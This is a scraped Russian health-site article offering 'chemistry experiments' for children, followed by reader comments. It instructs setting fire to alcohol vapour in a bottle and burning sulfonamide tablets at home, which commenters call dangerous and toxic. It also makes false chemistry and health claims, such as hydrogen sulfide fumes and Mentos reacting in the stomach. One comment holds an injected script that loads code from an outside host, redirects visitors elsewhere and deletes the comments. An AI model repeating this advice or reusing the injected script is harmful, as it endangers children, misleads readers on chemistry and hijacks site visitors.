Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Образовательные игры для ...  >>  Образовательные игры для детей. Химические опыты
 
Обратная связь
 

Образовательные игры для детей. Химические опыты

Размер шрифта
25 января 2012 08:00
  • google_analytics: false
  • Нравится

Научите ребенка основам химии с помощью простых и наглядных экспериментов. А все необходимые реактивы для опытов можно купить в любом магазине за пару десятков рублей.

Облако в бутылке

Этот эксперимент наглядно демонстрирует процесс образования облаков. Только вместо воды мы будем использовать этиловый спирт, чтобы реакция протекала более наглядно. Налейте столовую ложку спирта в пластиковую бутылку. Теперь повертите бутылку в руках так, чтобы спирт покрыл стенки бутылки. Теперь нагнетайте воздух в бутылку с помощью насоса. Накачайте 10-20 раз. Уберите насос – и в бутылке мгновенно появится облако.

Объяснение

Молекулы воды постоянно витают вокруг нас. Они образуются в результате испарения воды. В нашем случае – испарения спирта со стенок бутылки. Когда мы нагнетаем давление в бутылке, то мы заставляем молекулы сталкиваться между собой и сжиматься. Когда мы убираем насос, то давление резко падает, а вместе с ним падает температура воздуха. Это заставляет молекулы слипаться между собой, другими словами, влага конденсируется, образуя очень маленькие капли в воздухе. Это и есть облака. Спирт испаряется быстрей, чем вода, так как его молекулярные связи слабее. Этот опыт можно провести и с обычной водой, однако он будет менее наглядным.

Фараоновы змеи

В одном из библейских преданий говорится, как пророк Моисей, исчерпав все аргументы в споре с фараоном, совершил чудо, превратив жезл в извивающуюся змею... Фараон был посрамлен и напуган, Моисей получил разрешение покинуть Египет, а мир получил очередную загадку. В 20 веке химики предположили, что это была простая химическая реакция. Укрепите таблетку бисептола на кончике проволоки. Нагрейте таблетку на газовой горелке. Пойдет реакция – из таблетки полезут «змейки». Теперь вытягивайте их пинцетом, чтобы получить длинную «змейку».

Объяснение

Для эксперимента можно использовать любой сульфаниламидный лекарственный препарат, то есть стрептоцид, сульгин, сульфадиметоксин, этазол, сульфадимезин, фталазол или бисептол. В ходе нагревания таблетки происходит быстрое окисление, в результате которого выходит много газообразных продуктов реакции – пары воды, сероводород. Они вспучивают массу и формируют поры «змейки».

Ракета на спиртовой тяге

Этот эксперимент демонстрирует принцип работы ракетного двигателя. Исторически первым топливом был этиловый спирт, так как при горении он выделяет огромное количество тепловой энергии. Мы можем повторить опыт ракетостроителей и построить собственную ракету. Налейте спирт в бутылку и встряхните. Взболтайте спирт, чтобы он покрыл стенки бутылки изнутри. Теперь поднесите спичку и наслаждайтесь полетом.

Объяснение

При сжигании спирт выделяет большое количество тепловой энергии. Объем воздуха резко расширяется, что заставляет бутылку подлетать.

Кола с ментосом

Этот опыт весьма популярен в интернете. Он не только поясняет законы химии, но и наглядно демонстрирует ребенку, почему нельзя есть вредные продукты. Опыт очень простой. Откройте упаковку «Ментоса» и высыпьте ее на лист бумаги. Поставьте бутылку на пол, быстро засыпайте драже с листа в горлышко и отбегайте, чтобы не попасть под струю.

Объяснение

Драже в коле вызывает резкое вспенивание. Причина вспенивания в шероховатостях поверхности драже, которые служат центрами высвобождения углекислого газа. Процесс также усиливается добавками в напитке, такими как подсластитель аспартам, который вреден для здоровья. Он уменьшает поверхностное натяжение жидкости, что еще больше облегчает выделение газа. Другие ингредиенты, которые играют роль в процессе выделения газа: бензоат натрия (консервант) и кофеин в кока-коле; гуммиарабик и желатин в жевательных драже. Наиболее сильный эффект возникает с диетической колой и драже без глазури (более шероховатые и пористые).

Вывод

Никогда не запивайте «Ментос» газировкой, так как реакция может пройти у вас в желудке. Лучше вообще воздержаться от потребления этих продуктов, которые просто напичканы «химией».

Сюжеты по теме:
Игры для детей и взрослых. Занимательная химия

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

31 января 2012 в 16:05

Цитировать   |   Пожаловаться

Действительно, "В 20 веке химики предположили, что это была простая химическая реакция", а не сгорание сульфаниламидных препаратов, которых тогда не было.
А опыт с летающей бутылкой (с поджиганием паров спирта) вообще-то опасен для проведения его с детьми!

2 - helena

31 января 2012 в 16:14

Цитировать   |   Пожаловаться

Убрали сначала статью совсем, потом снова поместили , но с удаленными комментариями! На замечания, конечно, Вам наплевать, но не пишите о том, в чем не разбираетесь! Первый опыт - не имеет отношения к химии, это из области физики.

Но самый большой ужас в том, что в качестве продукта сгорания вещества Вы пишете сероводород!
Даже в школе проходят, что в процессе горения все химические элементы превращаются в свои оксиды! Продукты реакции здесь - во-первых, углекислый газ, потом - вода, и уж потом оксид серы SO3 (а не сероводород) и какой-нибудь оксид азота. Но и при этом опыт не безопасен (хоть и не сероводород, яд для печени выделяется): оксиды серы и азота токсичны, дома этот опыт не рекомендуется проводить!
Вам бы самим основам химии поучиться, прежде чем другим советы давать!

3 - zzzzzz

30 июня 2015 в 23:59

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Не запрещайте ребенку играть в видеоигры, они лечат смертельные болезни   Для того чтобы ребенок научился, достаточно его посадить   Подтянутые дети учатся лучше своих неспортивных сверстников   Бесчувственный язык – причина ожирения  
06 ноября 2012Подростки не могут побороть страх 22 октября 2012Детское ожирение – причина рака
 
02 октября 2012Пассивное курение делает детей умственно отсталыми! 23 августа 2012Если в доме есть собака, дети болеют реже!
 

Слайдшоу

1
Как вы убиваете своих детей
Как кормить малыша
Симптомы болезней у маленьких детей

Тесты

Что вы знаете о грудном вскармливании?
Что вы знаете об СДВГ?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.